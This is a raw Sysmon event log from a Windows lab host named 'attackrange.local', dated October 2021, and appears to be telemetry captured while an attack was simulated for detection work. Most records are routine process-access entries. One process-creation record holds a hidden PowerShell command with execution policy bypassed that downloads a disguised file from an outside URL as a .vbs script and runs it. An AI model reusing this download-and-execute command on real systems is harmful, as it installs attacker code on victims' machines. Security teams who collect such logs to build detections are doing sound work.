08:03:04.819{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B538-615A-7B02-00000000FC01}7256C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107955Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.819{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7D02-00000000FC01}2488C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107954Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.819{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7D02-00000000FC01}2488C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x8000000000000000107953Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.804{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_m2x0fdp4.rzl.ps12021-10-04 08:03:04.804 10341000x8000000000000000107952Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.804{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7B02-00000000FC01}7256C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107951Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.804{58E9C193-B538-615A-7D02-00000000FC01}24887600C:\Windows\system32\conhost.exe{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107950Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.804{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7B02-00000000FC01}7256C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107949Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.804{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6D02-00000000FC01}6984C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107948Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.804{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107947Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.804{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107946Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.804{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107945Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.804{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107944Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.789{58E9C193-B538-615A-7B02-00000000FC01}72565252C:\Windows\system32\conhost.exe{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107943Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.789{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7D02-00000000FC01}2488C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107942Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107941Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107940Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107939Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107938Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B538-615A-6B02-00000000FC01}7816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107937Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107936Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107935Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107934Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107933Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7802-00000000FC01}1396C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107932Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7802-00000000FC01}1396C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107931Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-AE62-615A-B200-00000000FC01}32124480C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107930Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-B538-615A-6802-00000000FC01}81006544C:\Windows\System32\WScript.exe{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107929Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.776{58E9C193-B538-615A-7C02-00000000FC01}2956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/ad.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\ad.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\ad.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000107928Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.772{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7B02-00000000FC01}7256C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107927Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.756{58E9C193-B538-615A-7302-00000000FC01}71566512C:\Windows\system32\conhost.exe{58E9C193-B538-615A-7A02-00000000FC01}2000C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107926Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.756{58E9C193-B538-615A-7802-00000000FC01}13968120C:\Windows\system32\conhost.exe{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107925Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.756{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7502-00000000FC01}7552C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107924Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 